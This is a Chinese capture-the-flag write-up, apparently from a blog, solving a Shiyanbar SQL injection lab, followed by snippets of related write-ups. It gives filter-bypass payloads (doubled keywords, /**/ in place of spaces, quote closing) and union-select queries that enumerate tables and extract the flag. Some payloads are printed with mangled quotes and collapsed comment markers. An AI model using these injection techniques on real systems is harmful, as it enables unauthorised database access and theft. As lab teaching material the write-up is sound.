這次來寫了乙個wp,我是小白希望大神們可以指點,因為自己是乙個人搞sql,有人指點能夠少走很多彎路。
先看這一題,我剛進來居然還來了個亂碼,不管了開始,看到這題目,命令注入得到flag,就想這一題無非就是繞過過濾,進行爆庫爆資料得到flag
輸入1,2,3以後,得到一些表名,這時就在猜想後台sql查詢語句為:select name where id =***xx;
先判斷注入點
先用1 and 1=1 發現and被過濾了 這裡採用andand雙寫繞過
1 andand 1=1 1 andand 1=2 發現不是數字型注入
再用 1』andand 1=1–+ ;# 發現注釋(–+,#)都被過濾了 這裡採用1』 andand 『1』=』1進行注釋
得到這個應該是『字元型注入(這裡我有點不大明白,但是這樣注入可以爆出來,所以也就是將錯就錯了,希望有大神可以給我指點一下子,而且此時的order by我實驗也沒成功,索性直接爆)
暴庫,表(建議也可以先查庫再查表)
這裡先不要閉合前面的『,先直接輸入查詢語句,看看這個sql後台究竟過濾了哪些
發現注釋–+,#什麼的都被過濾了,可以考慮利用andand』1』=』1進行閉合後面的』號;發現有空格過濾,這裡可以選擇雙寫繞過和/**/(注釋空格)進行繞過,發現group_concat;information_schema;table_schema都需要進行雙寫繞過
構造得:
得到表balotali,flag,web_1表,只有flag表對我們有用
我發現直接出表太利索了,得不到資料庫,所以還是一步一步來把 !
爆庫1』 union select database()』
發現都被過濾了
構造得1』//union//select/**/database()』
得到資料庫:web1(有用)
爆表和上述一樣先進行正常的sql語句
1 union select group_concat(table_name) from information_schema.tables where table_schema=』web1』
得到的還是被過濾的資訊
根據//注釋空格還用雙寫group等函式進行繞過
得到flag和web_1表,可知flag對我們有用進行查列
查列1』 union select column_name from information_schema.columns where table_name=』flag』
構造得:
1』//union//select//column_namcolumn_namee//from//information_scheminformation_schema.columnsa.columns//where/**/table_name=『flag』 andand 『1』='1(這裡可以用andand 『1』=』1進行閉合)
得到列名為:flag對我們有用
查資料直接構造得:1』//union//select//flag//from//flag//where/**/『1』='1
得到flag
總之,這道題考的還是很有意思的,剛開始做的時候,自己構造語句很多都構造錯,返回報錯,看報錯資訊一臉懵,雙寫繞過很常見,重點就是過濾掉了注釋和空格過濾,需要利用/注釋/繞過空格,也可以利用括號,考這一點讓我學到了,很實用,所以自己想寫乙個wp,充實一下自己,我自己寫的估計有很多地方不對,希望幫忙指點一下子。
實驗吧 CTF 簡單的sql注入思路
我們先用單引號測試 頁面錯誤 再加個單引號 頁面正常 那初步判斷語句應該是 select from xx where id 然後我們測試下我們滲透經常用的關鍵字有沒有被過濾 or and select union 1,2,3 information schema.tables information...
實驗吧 簡單的SQL注入2
首先輸入1,發現有將資料庫的查詢結果顯示出來 輸入單引號,發現錯誤,這時候可以猜測後台查詢語句 select name from table where id 可以先嘗試萬能密碼 查詢語句就變成 select name from table where id 會把所以結果都顯示出來一共三條記錄 接下...
實驗吧 簡單sql注入之3
簡單sql注入之3 以下皆根據布林盲注手工注入步驟並且借助burpsuite的intruder功能對資料庫名 表名等等進行爆破 需要注意 0x00 爆資料庫 方法一 可以通過burpsuite攔截資料報,更改ascii值重發獲取 1 and length database n 資料庫名長度是4 1 ...